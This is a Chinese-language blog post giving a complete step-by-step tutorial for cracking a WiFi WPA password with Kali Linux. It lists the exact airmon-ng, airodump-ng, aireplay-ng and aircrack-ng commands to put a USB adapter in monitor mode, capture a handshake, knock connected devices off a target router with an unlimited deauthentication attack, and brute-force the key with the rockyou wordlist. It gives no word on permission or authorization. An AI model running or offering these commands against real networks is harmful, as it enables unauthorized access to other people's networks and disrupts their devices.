利用KALI暴力破解WIFI密码

0x01 准备工作

利用kali破解wifi密码,需要在虚拟机里安装kali系统,并购买一个支持监听的外置USB网卡!

0x02 开始

插入usb网卡并查看

打开kali虚拟机,插入usb无线网卡,选择连接kali虚拟机

打开终端输入:

iwconfig

 

 

查看无线网卡

airmon-ng

  该命令列出了支持监控模式的无线网卡,如果没有任何输出,则表示无线网卡不支持监控模式。

记下Interface名称,开启网卡的监听模式

airmon-ng start wlan0

 如果出现结果如下图,说明还有其他网卡处于监听状态,需要先将其关闭

airmon-ng check kill

 

再次开启监听模式,并记下其Interface

airmon-ng start wlan0

 

 

扫描信号

扫描附近的wifi信号

airodump-ng wlan0mon

 找到自己的目标wifi后使用 Ctrl+c 中止

 

  •  BSSID  AP端的mac地址
  •  PWR         信号强度(绝对值越小,信号越强)
  •  Data         对应路由器的在线数据吞吐量,数值越大,数值上传量越大
  •  CH            对应路由的频道
  •  ESSID       对应路由器的名称

抓取握手包

输入命令:

airodump-ng -c 6 -w ./test --bssid 24:16:6D:21:D1:E0 wlan0mon
airodump-ng -c <AP信道> -w <抓取握手包后存放位置名称> --bssid <AP的mac地址> <interface名称>

 

 

 这里需要有设备与路由传输数据才可以。

解除认证攻击

保持命令窗口处于运行状态,再打开一个新的命令窗口,进行解除认证攻击,即强制连接到目的wifi路由的设备重新连接。

aireplay-ng -0 0 -a 88:C3:97:31:E8:9D -c C0:EE:FB:4F:A2:7F wlan0mon
aireplay-ng -<攻击模式,这里使用持续攻击(0)> [攻击次数,0为无限攻击] -a <AP端的MAC地址> -c <被攻击设备的MAC地址> <interface名称> 

 当下图所示位置显示 WPA hankshake  即成功抓到握手包,将两个命令框都输入 Ctrl + C 终止攻击和握手抓包。

 

 

 

 关闭无线网卡监听模式

airmon-ng stop wlan0mon

 0x03 使用字典暴力破解

kali自带有一份无线wifi密码字典,但是需要先解压

gzip -d /usr/share/wordlists/rockyou.txt.gz

 爆破

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 88:C3:97:31:E8:9D test-01.cap
aircrack-ng -w <指定字典> -b <目的路由MAC地址> <抓到的握手包>

 爆破成功后,如图区域会显示 KEY FOUND![ 密码 ]

 

 大功告成!!!

 

 
 
 
 
posted @ 2021-01-12 22:47  果冻ya  阅读(13684)  评论(0编辑  收藏  举报